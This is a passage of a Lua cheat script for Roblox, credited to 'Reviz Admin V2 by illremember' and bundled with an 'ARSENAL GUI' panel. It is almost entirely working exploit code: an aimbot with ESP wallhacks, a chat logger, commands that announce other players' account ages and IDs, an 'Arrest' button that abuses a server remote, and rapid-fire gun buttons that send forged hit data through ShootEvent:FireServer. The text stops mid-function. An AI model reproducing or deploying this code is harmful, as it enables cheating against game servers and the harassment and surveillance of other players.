  3315.                     for i,player in pairs(GetPlayer(string.sub(CMDBAR.Text, 10))) do
  3316.                         v.Parent = player.Character
  3317.                     end
  3318.                 end
  3319.             end
  3320.         end
  3321.         if string.sub(CMDBAR.Text, 1, 4) == ("age ") then
  3322.             for i,player in pairs(GetPlayer(string.sub(CMDBAR.Text, 5))) do
  3323.                 game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(player.Name.." Account Age: "..player.AccountAge.." days!", "All")
  3324.             end
  3325.         end
  3326.         if string.sub(CMDBAR.Text, 1, 3) == ("id ") then
  3327.             for i,player in pairs(GetPlayer(string.sub(CMDBAR.Text, 4))) do
  3328.                 game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(player.Name.." Account ID: "..player.UserId, "All")
  3329.             end
  3330.         end
  3331.         if string.sub(CMDBAR.Text, 1, 5) == (".age ") then
  3332.             for i,player in pairs(GetPlayer(string.sub(CMDBAR.Text, 6))) do
  3333.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  3334.                 Title = player.AccountAge.." Days";
  3335.                 Text = "Account age of "..player.Name;
  3336.                 })
  3337.             end
  3338.         end
  3339.         if string.sub(CMDBAR.Text, 1, 4) == (".id ") then
  3340.             for i,player in pairs(GetPlayer(string.sub(CMDBAR.Text, 5))) do
  3341.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  3342.                 Title = player.UserId.." ID";
  3343.                 Text = "Account ID of "..player.Name;
  3344.                 })
  3345.             end
  3346.         end
  3347.         if string.sub(CMDBAR.Text, 1, 6) == ("gameid") then
  3348.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3349.             Title = "Game ID";
  3350.             Text = "Game ID: ".. game.GameId;
  3351.             })
  3352.         end
  3353.         if string.sub(CMDBAR.Text, 1, 3) == ("pgs") then
  3354.             local pgscheck = game:GetService("Workspace"):PGSIsEnabled()
  3355.             if pgscheck == true then
  3356.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  3357.                 Title = "PGSPhysicsSolverEnabled";
  3358.                 Text = "PGS is Enabled!";
  3359.                 })
  3360.             else
  3361.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  3362.                 Title = "PGSPhysicsSolverEnabled";
  3363.                 Text = "PGS is Disabled!";
  3364.                 })
  3365.             end
  3366.         end
  3367.         if string.sub(CMDBAR.Text, 1, 11) == ("removeinvis") then
  3368.             for i,v in pairs(game:GetService("Workspace"):GetDescendants()) do
  3369.                 if v:IsA("Part") then
  3370.                     if v.Transparency == 1 then
  3371.                         if v.Name ~= "HumanoidRootPart" then
  3372.                             v:Destroy()
  3373.                         end
  3374.                     end
  3375.                 end
  3376.             end
  3377.         end
  3378.         if string.sub(CMDBAR.Text, 1, 9) == ("removefog") then
  3379.             game:GetService("Lighting").FogStart = 0
  3380.             game:GetService("Lighting").FogEnd = 9999999999999
  3381.         end
  3382.         if string.sub(CMDBAR.Text, 1, 7) == ("disable") then
  3383.             lplayer.Character.Humanoid.Parent = lplayer
  3384.         end
  3385.         if string.sub(CMDBAR.Text, 1, 6) == ("enable") then
  3386.             lplayer.Humanoid.Parent = lplayer.Character
  3387.         end
  3388.         if string.sub(CMDBAR.Text, 1, 13) == ("givealltools ") then
  3389.             for i,v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetDescendants()) do
  3390.                 if v:IsA("Tool") then
  3391.                     v.Parent = lplayer.Character
  3392.                     wait()
  3393.                     for i,player in pairs(GetPlayer(string.sub(CMDBAR.Text, 14))) do
  3394.                         v.Parent = player.Character
  3395.                     end
  3396.                 end
  3397.             end
  3398.         end
  3399.         if string.sub(CMDBAR.Text, 1, 9) == ("flyspeed ") then
  3400.             speedfly = string.sub(CMDBAR.Text, 10)
  3401.             wait()
  3402.             change()
  3403.         end
  3404.         if string.sub(CMDBAR.Text, 1, 7) == ("carpet ") then
  3405.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 8))) do
  3406.                 local Anim3 = Instance.new("Animation")
  3407.                 Anim3.AnimationId = "rbxassetid://282574440"
  3408.                 local track3 = lplayer.Character.Humanoid:LoadAnimation(Anim3)
  3409.                 track3:Play(.1, 1, 1)
  3410.                 bplrr = v.Name
  3411.                 banpl = true
  3412.             end
  3413.         end
  3414.         if string.sub(CMDBAR.Text, 1, 8) == ("uncarpet") then
  3415.             banpl = false
  3416.         end
  3417.         if string.sub(CMDBAR.Text, 1, 6) == ("stare ") then
  3418.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 7))) do
  3419.                 staring = true
  3420.                 stareplr = v
  3421.             end
  3422.         end
  3423.         if string.sub(CMDBAR.Text, 1, 7) == ("unstare") then
  3424.             staring = false
  3425.         end
  3426.         if string.sub(CMDBAR.Text, 1, 7) == ("logchat") then
  3427.             chatlogs = true
  3428.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3429.             Title = "LogChat enabled";
  3430.             Text = "Now logging all player chat.";
  3431.             })
  3432.         end
  3433.         if string.sub(CMDBAR.Text, 1, 9) == ("unlogchat") then
  3434.             chatlogs = false
  3435.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3436.             Title = "LogChat disabled";
  3437.             Text = "Stopped logging all player chat.";
  3438.             })
  3439.         end
  3440.         if string.sub(CMDBAR.Text, 1, 6) == ("fixcam") then
  3441.             game:GetService("Workspace").CurrentCamera:Destroy()
  3442.             wait(0.1)
  3443.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Humanoid
  3444.             game:GetService("Workspace").CurrentCamera.CameraType = "Custom"
  3445.             lplayer.CameraMinZoomDistance = 0.5
  3446.             lplayer.CameraMaxZoomDistance = 400
  3447.             lplayer.CameraMode = "Classic"
  3448.         end
  3449.         if string.sub(CMDBAR.Text, 1, 7) == ("unstate") then
  3450.             changingstate = false
  3451.         end
  3452.         CMDBAR.Text = ""
  3453.     end
  3454. end)
  3455.  
  3456. wait(0.3)
  3457. game:GetService("StarterGui"):SetCore("SendNotification", {
  3458.     Title = "Loaded successfully!";
  3459.     Text = "Reviz Admin V2 by illremember";
  3460. })
  3461. wait(0.1)
  3462. print("Reviz Admin V2 loaded!")
  3463. if game:GetService("Workspace").FilteringEnabled == true then
  3464.     warn("FE is Enabled (Filtering Enabled)")
  3465.     game:GetService("StarterGui"):SetCore("SendNotification", {
  3466.         Title = "FE is Enabled";
  3467.         Text = "Filtering Enabled. Enjoy using Reviz Admin!";
  3468.     })
  3469. else
  3470.     warn("FE is Disabled (Filtering Disabled) Consider using a different admin script.")
  3471.     game:GetService("StarterGui"):SetCore("SendNotification", {
  3472.         Title = "FE is Disabled";
  3473.         Text = "Filtering Disabled. Consider using a different admin script.";
  3474.     })
  3475. end
  3476.  
  3477. local intro = Instance.new("ScreenGui")
  3478. local Frame = Instance.new("Frame")
  3479. local ImageLabel = Instance.new("ImageLabel")
  3480. intro.Parent = game:GetService("CoreGui")
  3481. Frame.Parent = intro
  3482. Frame.BackgroundColor3 = Color3.new(1, 1, 1)
  3483. Frame.BackgroundTransparency = 1
  3484. Frame.Size = UDim2.new(1, 0, 0, 300)
  3485. Frame.Position = UDim2.new(0, 0, -0.4, 0)
  3486. ImageLabel.Parent = Frame
  3487. ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  3488. ImageLabel.BackgroundTransparency = 1
  3489. ImageLabel.Position = UDim2.new(0, 0, 0, 0)
  3490. ImageLabel.Size = UDim2.new(1, 0, 1, 0)
  3491. ImageLabel.Image = "http://www.roblox.com/asset/?id=1542162618"
  3492. Frame:TweenPosition(UDim2.new(0, 0, 0.2, 0), "Out", "Elastic", 3)
  3493. wait(3.01)
  3494. Frame:TweenPosition(UDim2.new(0, 0, 1.5, 0), "Out", "Elastic", 5)
  3495. wait(5.01)
  3496. intro:Destroy()
  3497. end)
  3498.  
  3499. arrest.Name = "arrest"
  3500. arrest.Parent = main
  3501. arrest.BackgroundColor3 = Color3.new(0, 1, 1)
  3502. arrest.Position = UDim2.new(0.349623203, 0, 0.306112915, 0)
  3503. arrest.Size = UDim2.new(0, 110, 0, 32)
  3504. arrest.Font = Enum.Font.GothamBlack
  3505. arrest.Text = "Arrest"
  3506. arrest.TextColor3 = Color3.new(1, 0, 0)
  3507. arrest.TextSize = 14
  3508. arrest.MouseButton1Down:connect(function()
  3509. local mouse = game.Players.LocalPlayer:GetMouse()
  3510. local arrestEvent = game.Workspace.Remote.arrest
  3511. mouse.Button1Down:connect(function()
  3512. local obj = mouse.Target
  3513. local response = arrestEvent:InvokeServer(obj)
  3514.  end)
  3515. end)
  3516.  
  3517. attach.Name = "attach"
  3518. attach.Parent = main
  3519. attach.BackgroundColor3 = Color3.new(0, 1, 1)
  3520. attach.Position = UDim2.new(0.679666638, 0, 0.304921538, 0)
  3521. attach.Size = UDim2.new(0, 111, 0, 32)
  3522. attach.Font = Enum.Font.GothamBlack
  3523. attach.Text = "Aimbot"
  3524. attach.TextColor3 = Color3.new(1, 0, 0)
  3525. attach.TextSize = 14
  3526. attach.MouseButton1Down:connect(function()
  3527. local plrs = game:GetService("Players")
  3528. local TeamBased = true ; local teambasedswitch = "o"
  3529. local presskeytoaim = true; local aimkey = "e"
  3530. local raycast = false
  3531.  
  3532. local espupdatetime = 5; autoesp = false
  3533.  
  3534.  
  3535.  
  3536. local lockaim = true; local lockangle = 5
  3537.  
  3538.  
  3539.  
  3540. --function findwat(folder, what)
  3541. --  for i, smth in pairs(folder:GetChildren()) do
  3542. --      if string.find(string.lower(tostring(smth)), string.lower(what)) then
  3543. --          return smth
  3544. --      end
  3545. --  end
  3546. --end
  3547. --
  3548. --local plrs = findwat(game, "Players")
  3549.  
  3550.  
  3551.  
  3552.  
  3553. local Gui = Instance.new("ScreenGui")
  3554. local Move = Instance.new("Frame")
  3555. local Main = Instance.new("Frame")
  3556. local EspStatus = Instance.new("TextLabel")
  3557. local st1 = Instance.new("TextLabel")
  3558. local st1_2 = Instance.new("TextLabel")
  3559. local st1_3 = Instance.new("TextLabel")
  3560. local Name = Instance.new("TextLabel")
  3561. --Properties:
  3562. Gui.Name = "Gui"
  3563. Gui.Parent = plrs.LocalPlayer:WaitForChild("PlayerGui")
  3564.  
  3565. Move.Name = "Move"
  3566. Move.Parent = Gui
  3567. Move.BackgroundColor3 = Color3.new(0.545098, 0, 0)
  3568. Move.BackgroundTransparency = 1
  3569. Move.BorderSizePixel = 0
  3570. Move.Draggable = true
  3571. Move.Position = UDim2.new(0.005, 0, -0.15, 0)
  3572. Move.Size = UDim2.new(0.28141585, 0, 0.0320388414, 0)
  3573.  
  3574. Main.Name = "Main"
  3575. Main.Parent = Move
  3576. Main.BackgroundColor3 = Color3.new(1, 1, 1)
  3577. Main.Position = UDim2.new(0, -7, 20.9960003, 0)
  3578. Main.Size = UDim2.new(1, 0, 5.79699993, 0)
  3579. Main.Style = Enum.FrameStyle.RobloxSquare
  3580.  
  3581. EspStatus.Name = "EspStatus"
  3582. EspStatus.Parent = Main
  3583. EspStatus.BackgroundColor3 = Color3.new(1, 1, 1)
  3584. EspStatus.BackgroundTransparency = 1
  3585. EspStatus.Position = UDim2.new(0, 0, 0.300000012, 0)
  3586. EspStatus.Size = UDim2.new(1, 0, 0.162, 0)
  3587. EspStatus.Font = Enum.Font.ArialBold
  3588. EspStatus.Text = "Press O to change team based mode"
  3589. EspStatus.TextColor3 = Color3.new(0.6, 0.196078, 0.8)
  3590. EspStatus.TextScaled = true
  3591. EspStatus.TextWrapped = true
  3592.  
  3593. st1.Name = "st1"
  3594. st1.Parent = Main
  3595. st1.BackgroundColor3 = Color3.new(1, 1, 1)
  3596. st1.BackgroundTransparency = 1
  3597. st1.Position = UDim2.new(0.271787882, 0, 0, 0)
  3598. st1.Size = UDim2.new(0.728211343, 0, 0.161862016, 0)
  3599. st1.Font = Enum.Font.ArialBold
  3600. st1.Text = ""
  3601. st1.TextColor3 = Color3.new(0.0784314, 0.541176, 0)
  3602. st1.TextScaled = true
  3603. st1.TextSize = 14
  3604. st1.TextWrapped = true
  3605.  
  3606. st1_2.Name = "st1"
  3607. st1_2.Parent = Main
  3608. st1_2.BackgroundColor3 = Color3.new(1, 1, 1)
  3609. st1_2.BackgroundTransparency = 1
  3610. st1_2.Position = UDim2.new(0, 0, 0.875999987, 0)
  3611. st1_2.Size = UDim2.new(0.999999881, 0, 0.161862016, 0)
  3612. st1_2.Font = Enum.Font.ArialBold
  3613. st1_2.Text = "Press E to lock on a person inside ur view"
  3614. st1_2.TextColor3 = Color3.new(0.6, 0.196078, 0.8)
  3615. st1_2.TextScaled = true
  3616. st1_2.TextWrapped = true
  3617.  
  3618. st1_3.Name = "st1"
  3619. st1_3.Parent = Main
  3620. st1_3.BackgroundColor3 = Color3.new(1, 1, 1)
  3621. st1_3.BackgroundTransparency = 1
  3622. st1_3.Position = UDim2.new(0, 0, 0.54, 0)
  3623. st1_3.Size = UDim2.new(1, 0, 0.261999995, 0)
  3624. st1_3.Font = Enum.Font.ArialBold
  3625. st1_3.Text = "Press L to enable esp loop and press T to update esp"
  3626. st1_3.TextColor3 = Color3.new(0.6, 0.196078, 0.8)
  3627. st1_3.TextScaled = true
  3628. st1_3.TextWrapped = true
  3629.  
  3630.  
  3631. Name.Name = "Name"
  3632. Name.Parent = Move
  3633. Name.BackgroundColor3 = Color3.new(0.545098, 0, 0)
  3634. Name.BackgroundTransparency = 1
  3635. Name.Position = UDim2.new(0, 25, 20.9860001, 0)
  3636. Name.Size = UDim2.new(0.838, 0, 1.27999997, 0)
  3637. Name.Font = Enum.Font.Arcade
  3638. Name.Text = "ARSENAL GUI"
  3639. Name.TextColor3 = Color3.new(0.541176, 0.168627, 0.886275)
  3640. Name.TextScaled = true
  3641. Name.TextSize = 12
  3642. Name.TextWrapped = true
  3643. -- Scripts:
  3644.  
  3645.  
  3646. local plrsforaim = {}
  3647.  
  3648. local lplr = game:GetService("Players").LocalPlayer
  3649. Move.Draggable = true
  3650. Gui.ResetOnSpawn = false
  3651. Gui.Name = "Chat"
  3652. Gui.DisplayOrder = 999
  3653.  
  3654.     Gui.Parent = plrs.LocalPlayer.PlayerGui
  3655.  
  3656.  
  3657. f = {}
  3658. local espforlder
  3659.  
  3660. f.addesp = function()
  3661.     --print("ESP ran")
  3662.     if espforlder then
  3663.     else
  3664.         espforlder = Instance.new("Folder")
  3665.         espforlder.Parent = game.Workspace.CurrentCamera
  3666.     end
  3667.     for i, v in pairs(espforlder:GetChildren()) do
  3668.         v:Destroy()
  3669.     end
  3670.     for _, plr in pairs(plrs:GetChildren()) do
  3671.         if plr.Character and plr.Character.Humanoid.Health > 0 and plr.Name ~= lplr.Name then
  3672.             if TeamBased == true then
  3673.                 if plr.Team.Name ~= plrs.LocalPlayer.Team.Name  then
  3674.                     local e = espforlder:FindFirstChild(plr.Name)
  3675.                     if not e then
  3676.                         --print("Added esp for team based")
  3677.                         local bill = Instance.new("BillboardGui", espforlder)
  3678.                         bill.Name = plr.Name
  3679.                         bill.AlwaysOnTop = true
  3680.                         bill.Size = UDim2.new(1,0,1,0)
  3681.                         bill.Adornee = plr.Character.Head
  3682.                         local Frame = Instance.new('Frame',bill)
  3683.                         Frame.Active = true
  3684.                         Frame.BackgroundColor3 = Color3.new(0.862745, 0.0784314, 0.235294)
  3685.                         Frame.BackgroundTransparency = 0
  3686.                         Frame.BorderSizePixel = 0
  3687.                         Frame.AnchorPoint = Vector2.new(.5, .5)
  3688.                         Frame.Position = UDim2.new (0.5,0,0.5,0)
  3689.                         Frame.Size = UDim2.new (1,0,1,0)
  3690.                         Frame.Rotation = 0
  3691.                         plr.Character.Humanoid.Died:Connect(function()
  3692.                             bill:Destroy()
  3693.                         end)
  3694.                     end
  3695.                 end
  3696.             else
  3697.                 local e = espforlder:FindFirstChild(plr.Name)
  3698.                 if not e then
  3699.                     --print("Added esp")
  3700.                     local bill = Instance.new("BillboardGui", espforlder)
  3701.                     bill.Name = plr.Name
  3702.                     bill.AlwaysOnTop = true
  3703.                     bill.Size = UDim2.new(1,0,1,0)
  3704.                     bill.Adornee = plr.Character.Head
  3705.                     local Frame = Instance.new('Frame',bill)
  3706.                     Frame.Active = true
  3707.                     Frame.BackgroundColor3 = Color3.new(0/255,255/255,0/255)
  3708.                     Frame.BackgroundTransparency = 0
  3709.                     Frame.BorderSizePixel = 0
  3710.                     Frame.AnchorPoint = Vector2.new(.5, .5)
  3711.                     Frame.Position = UDim2.new (0.5,0,0.5,0)
  3712.                     Frame.Size = UDim2.new (1,0,1,0)
  3713.                     Frame.Rotation = 0
  3714.                     plr.Character.Humanoid.Died:Connect(function()
  3715.                         bill:Destroy()
  3716.                     end)
  3717.                 end
  3718.             end
  3719.            
  3720.            
  3721.         end
  3722.     end
  3723. end
  3724. local cam = game.Workspace.CurrentCamera
  3725.  
  3726. local mouse = lplr:GetMouse()
  3727. local switch = false
  3728. local key = "k"
  3729. local aimatpart = nil
  3730. mouse.KeyDown:Connect(function(a)
  3731.     if a == "t" then
  3732.         print("worked1")
  3733.         f.addesp()
  3734.     elseif a == "u" then
  3735.         if raycast == true then
  3736.             raycast = false
  3737.         else
  3738.             raycast = true
  3739.         end
  3740.     elseif a == "l" then
  3741.         if autoesp == false then
  3742.             autoesp = true
  3743.         else
  3744.             autoesp = false
  3745.         end
  3746.     end
  3747.     if a == "j" then
  3748.         if mouse.Target then
  3749.             mouse.Target:Destroy()
  3750.         end
  3751.     end
  3752.     if a == key then
  3753.         if switch == false then
  3754.             switch = true
  3755.         else
  3756.             switch = false
  3757.             if aimatpart ~= nil then
  3758.                 aimatpart = nil
  3759.             end
  3760.         end
  3761.     elseif a == teambasedswitch then
  3762.         if TeamBased == true then
  3763.             TeamBased = false
  3764.             teambasedstatus.Text = tostring(TeamBased)
  3765.         else
  3766.             TeamBased = true
  3767.             teambasedstatus.Text = tostring(TeamBased)
  3768.         end
  3769.     elseif a == aimkey then
  3770.         if not aimatpart then
  3771.             local maxangle = math.rad(20)
  3772.             for i, plr in pairs(plrs:GetChildren()) do
  3773.                 if plr.Name ~= lplr.Name and plr.Character and plr.Character.Head and plr.Character.Humanoid and plr.Character.Humanoid.Health > 1 then
  3774.                     if TeamBased == true then
  3775.                         if plr.Team.Name ~= lplr.Team.Name then
  3776.                             local an = checkfov(plr.Character.Head)
  3777.                             if an < maxangle then
  3778.                                 maxangle = an
  3779.                                 aimatpart = plr.Character.Head
  3780.                             end
  3781.                         end
  3782.                     else
  3783.                         local an = checkfov(plr.Character.Head)
  3784.                             if an < maxangle then
  3785.                                 maxangle = an
  3786.                                 aimatpart = plr.Character.Head
  3787.                             end
  3788.                             print(plr)
  3789.                     end
  3790.                     plr.Character.Humanoid.Died:Connect(function()
  3791.                         if aimatpart.Parent == plr.Character or aimatpart == nil then
  3792.                             aimatpart = nil
  3793.                         end
  3794.                     end)
  3795.                 end
  3796.             end
  3797.         else
  3798.             aimatpart = nil
  3799.         end
  3800.     end
  3801. end)
  3802.  
  3803. function getfovxyz (p0, p1, deg)
  3804.     local x1, y1, z1 = p0:ToOrientation()
  3805.     local cf = CFrame.new(p0.p, p1.p)
  3806.     local x2, y2, z2 = cf:ToOrientation()
  3807.     --local d = math.deg
  3808.     if deg then
  3809.         --return Vector3.new(d(x1-x2), d(y1-y2), d(z1-z2))
  3810.     else
  3811.         return Vector3.new((x1-x2), (y1-y2), (z1-z2))
  3812.     end
  3813. end
  3814.  
  3815. function getaimbotplrs()
  3816.     plrsforaim = {}
  3817.     for i, plr in pairs(plrs:GetChildren()) do
  3818.         if plr.Character and plr.Character.Humanoid and plr.Character.Humanoid.Health > 0 and plr.Name ~= lplr.Name and plr.Character.Head then
  3819.            
  3820.             if TeamBased == true then
  3821.                 if plr.Team.Name ~= lplr.Team.Name then
  3822.                     local cf = CFrame.new(game.Workspace.CurrentCamera.CFrame.p, plr.Character.Head.CFrame.p)
  3823.                     local r = Ray.new(cf, cf.LookVector * 10000)
  3824.                     local ign = {}
  3825.                     for i, v in pairs(plrs.LocalPlayer.Character:GetChildren()) do
  3826.                         if v:IsA("BasePart") then
  3827.                             table.insert(ign , v)
  3828.                         end
  3829.                     end
  3830.                     local obj = game.Workspace:FindPartOnRayWithIgnoreList(r, ign)
  3831.                     if obj.Parent == plr.Character and obj.Parent ~= lplr.Character then
  3832.                         table.insert(plrsforaim, obj)
  3833.                     end
  3834.                 end
  3835.             else
  3836.                 local cf = CFrame.new(game.Workspace.CurrentCamera.CFrame.p, plr.Character.Head.CFrame.p)
  3837.                 local r = Ray.new(cf, cf.LookVector * 10000)
  3838.                 local ign = {}
  3839.                 for i, v in pairs(plrs.LocalPlayer.Character:GetChildren()) do
  3840.                     if v:IsA("BasePart") then
  3841.                         table.insert(ign , v)
  3842.                     end
  3843.                 end
  3844.                 local obj = game.Workspace:FindPartOnRayWithIgnoreList(r, ign)
  3845.                 if obj.Parent == plr.Character and obj.Parent ~= lplr.Character then
  3846.                     table.insert(plrsforaim, obj)
  3847.                 end
  3848.             end
  3849.            
  3850.            
  3851.         end
  3852.     end
  3853. end
  3854.  
  3855. function aimat(part)
  3856.     cam.CFrame = CFrame.new(cam.CFrame.p, part.CFrame.p)
  3857. end
  3858. function checkfov (part)
  3859.     local fov = getfovxyz(game.Workspace.CurrentCamera.CFrame, part.CFrame)
  3860.     local angle = math.abs(fov.X) + math.abs(fov.Y)
  3861.     return angle
  3862. end
  3863.  
  3864. game:GetService("RunService").RenderStepped:Connect(function()
  3865.     if aimatpart then
  3866.         aimat(aimatpart)
  3867.         if aimatpart.Parent == plrs.LocalPlayer.Character then
  3868.             aimatpart = nil
  3869.         end
  3870.     end
  3871.    
  3872.    
  3873. --  if switch == true then
  3874. --      local maxangle = 99999
  3875. --     
  3876. --      --print("Loop")
  3877. --      if true and raycast == false then
  3878. --          for i, plr in pairs(plrs:GetChildren()) do
  3879. --              if plr.Name ~= lplr.Name and plr.Character and plr.Character.Head and plr.Character.Humanoid and plr.Character.Humanoid.Health > 1 then
  3880. --                  if TeamBased then
  3881. --                      if plr.Team.Name ~= lplr.Team.Name or plr.Team.TeamColor ~= lplr.Team.TeamColor then
  3882. --                          local an = checkfov(plr.Character.Head)
  3883. --                          if an < maxangle then
  3884. --                              maxangle = an
  3885. --                              aimatpart = plr.Character.Head
  3886. --                              if an < lockangle then
  3887. --                                  break
  3888. --                              end
  3889. --                          end
  3890. --                      end
  3891. --                  else
  3892. --                      local an = checkfov(plr.Character.Head)
  3893. --                          if an < maxangle then
  3894. --                              maxangle = an
  3895. --                              aimatpart = plr.Character.Head
  3896. --                              if an < lockangle then
  3897. --                                  break
  3898. --                              end
  3899. --                          end
  3900. --                  end
  3901. --                 
  3902. --                 
  3903. --                 
  3904. --                 
  3905. --              end
  3906. --          end
  3907. --      elseif raycast == true then
  3908. --         
  3909. --      end
  3910.        
  3911.         if raycast == true and switch == false and not aimatpart then
  3912.             getaimbotplrs()
  3913.             aimatpart = nil
  3914.             local maxangle = 999
  3915.             for i, v in ipairs(plrsforaim) do
  3916.                 if v.Parent ~= lplr.Character then
  3917.                     local an = checkfov(v)
  3918.                     if an < maxangle and v ~= lplr.Character.Head then
  3919.                         maxangle = an
  3920.                         aimatpart = v
  3921.                         print(v:GetFullName())
  3922.                         v.Parent.Humanoid.Died:connect(function()
  3923.                             aimatpart = nil
  3924.                         end)
  3925.                     end
  3926.                 end
  3927.             end
  3928.        
  3929.     end
  3930. end)
  3931. delay(0, function()
  3932.     while wait(espupdatetime) do
  3933.         if autoesp == true then
  3934.             pcall(function()
  3935.             f.addesp()
  3936.             end)
  3937.         end
  3938.     end
  3939. end)
  3940. warn("loaded")
  3941. end)
  3942.  
  3943. fastrem.Name = "fastrem"
  3944. fastrem.Parent = main
  3945. fastrem.BackgroundColor3 = Color3.new(1, 0.333333, 0)
  3946. fastrem.Position = UDim2.new(0.00783289783, 0, 0.518048227, 0)
  3947. fastrem.Size = UDim2.new(0, 84, 0, 32)
  3948. fastrem.Font = Enum.Font.Bodoni
  3949. fastrem.Text = "Fast Remington"
  3950. fastrem.TextColor3 = Color3.new(0, 0, 0)
  3951. fastrem.TextSize = 14
  3952. fastrem.MouseButton1Down:connect(function()
  3953. local Player = game.Players.LocalPlayer.Name
  3954. local Gun = "Remington 870" -- < -- Gun Name
  3955. local Run = game:GetService("RunService")
  3956.  
  3957. Gun = game.Players[Player].Character[Gun]
  3958. local Mouse = game.Players.LocalPlayer:GetMouse()
  3959. local Down = false
  3960. local Sound = Gun.Handle.FireSound
  3961.  
  3962. function CreateRay(Point_A, Point_B)
  3963. local Ray = Ray.new(Point_A, (Point_B - Point_A).Unit * (2 ^ 31 - 1))
  3964. local Part, Pos = workspace:FindPartOnRay(Ray, game.Players.LocalPlayer.Character)
  3965. local Dist = (Point_A - Pos).Magnitude
  3966. local CFrame = CFrame.new(Point_A, Pos) * CFrame.new(0, 0, -Dist / 2)
  3967.  
  3968. return CFrame, Dist, Ray
  3969. end
  3970.  
  3971. function FireLaser(target)
  3972. coroutine.resume(coroutine.create(function()
  3973. local C, D, R = CreateRay(Gun.Muzzle.CFrame.p, target.CFrame.p)
  3974. local Bullet = Instance.new("Part", Gun)
  3975. Bullet.BrickColor = BrickColor.Yellow()
  3976. Bullet.Material = "Neon"
  3977. Bullet.Anchored = true
  3978. Bullet.CanCollide = false
  3979. Bullet.Size = Vector3.new(0.2, 0.2, D)
  3980. Bullet.CFrame = C
  3981.  
  3982. local bulletTable = {}
  3983. table.insert(bulletTable, {
  3984. Hit = target,
  3985. Distance = D,
  3986. Cframe = C,
  3987. RayObject = R
  3988. })
  3989.  
  3990. game.ReplicatedStorage.ShootEvent:FireServer(bulletTable, Gun)
  3991. local C = Sound:Clone()
  3992. C.Parent = Gun
  3993. C:Play()
  3994. wait(0.05)
  3995. Bullet:Remove()
  3996. end))
  3997. end
  3998.  
  3999. Mouse.Button1Down:Connect(function()
  4000. Down = true
  4001. end)
  4002.  
  4003.  
  4004. Mouse.Button1Up:Connect(function()
  4005. Down = false
  4006. end)
  4007.  
  4008. while Run.Stepped:wait() do
  4009. if Down == true then
  4010. game.ReplicatedStorage.SoundEvent:FireServer(Sound, Gun)
  4011. FireLaser(Mouse.Target)
  4012. end
  4013. end
  4014. end)
  4015.  
  4016. fastm9.Name = "fastm9"
  4017. fastm9.Parent = main
  4018. fastm9.BackgroundColor3 = Color3.new(1, 0.333333, 0)
  4019. fastm9.Position = UDim2.new(0.267702788, 0, 0.518048167, 0)
  4020. fastm9.Size = UDim2.new(0, 84, 0, 32)
  4021. fastm9.Font = Enum.Font.Bodoni
  4022. fastm9.Text = "Fast M9"
  4023. fastm9.TextColor3 = Color3.new(0, 0, 0)
  4024. fastm9.TextSize = 14
  4025. fastm9.MouseButton1Down:connect(function()
  4026. local Player = game.Players.LocalPlayer.Name
  4027. local Gun = "M9" -- < -- Gun Name
  4028. local Run = game:GetService("RunService")
  4029.  
  4030. Gun = game.Players[Player].Character[Gun]
  4031. local Mouse = game.Players.LocalPlayer:GetMouse()
  4032. local Down = false
  4033. local Sound = Gun.Handle.FireSound
  4034.  
  4035. function CreateRay(Point_A, Point_B)
  4036. local Ray = Ray.new(Point_A, (Point_B - Point_A).Unit * (2 ^ 31 - 1))
  4037. local Part, Pos = workspace:FindPartOnRay(Ray, game.Players.LocalPlayer.Character)
  4038. local Dist = (Point_A - Pos).Magnitude
  4039. local CFrame = CFrame.new(Point_A, Pos) * CFrame.new(0, 0, -Dist / 2)
  4040.  
  4041. return CFrame, Dist, Ray
  4042. end
  4043.  
  4044. function FireLaser(target)
  4045. coroutine.resume(coroutine.create(function()
  4046. local C, D, R = CreateRay(Gun.Muzzle.CFrame.p, target.CFrame.p)
  4047. local Bullet = Instance.new("Part", Gun)
  4048. Bullet.BrickColor = BrickColor.Yellow()
  4049. Bullet.Material = "Neon"
  4050. Bullet.Anchored = true
  4051. Bullet.CanCollide = false
  4052. Bullet.Size = Vector3.new(0.2, 0.2, D)
  4053. Bullet.CFrame = C
  4054.  
  4055. local bulletTable = {}
  4056. table.insert(bulletTable, {
  4057. Hit = target,
  4058. Distance = D,
  4059. Cframe = C,
  4060. RayObject = R
  4061. })
  4062.  
  4063. game.ReplicatedStorage.ShootEvent:FireServer(bulletTable, Gun)
  4064. local C = Sound:Clone()
  4065. C.Parent = Gun
  4066. C:Play()
  4067. wait(0.05)
  4068. Bullet:Remove()
  4069. end))
  4070. end
  4071.  
  4072. Mouse.Button1Down:Connect(function()
  4073. Down = true
  4074. end)
  4075.  
  4076.  
  4077. Mouse.Button1Up:Connect(function()
  4078. Down = false
  4079. end)
  4080.  
  4081. while Run.Stepped:wait() do
  4082. if Down == true then
  4083. game.ReplicatedStorage.SoundEvent:FireServer(Sound, Gun)
  4084. FireLaser(Mouse.Target)
  4085. end
  4086. end
  4087. end)
  4088.  
  4089. fasttaze.Name = "fasttaze"
  4090. fasttaze.Parent = main
  4091. fasttaze.BackgroundColor3 = Color3.new(1, 0.333333, 0)
  4092. fasttaze.Position = UDim2.new(0.522364557, 0, 0.518048108, 0)
  4093. fasttaze.Size = UDim2.new(0, 84, 0, 32)
  4094. fasttaze.Font = Enum.Font.Bodoni
  4095. fasttaze.Text = "Fast Taser"
  4096. fasttaze.TextColor3 = Color3.new(0, 0, 0)
  4097. fasttaze.TextSize = 14
  4098. fasttaze.MouseButton1Down:connect(function()
  4099. local Player = game.Players.LocalPlayer.Name
  4100. local Gun = "Taser" -- < -- Gun Name
  4101. local Run = game:GetService("RunService")
  4102.  
  4103. Gun = game.Players[Player].Character[Gun]
  4104. local Mouse = game.Players.LocalPlayer:GetMouse()
  4105. local Down = false
  4106. local Sound = Gun.Handle.FireSound
  4107.  
  4108. function CreateRay(Point_A, Point_B)
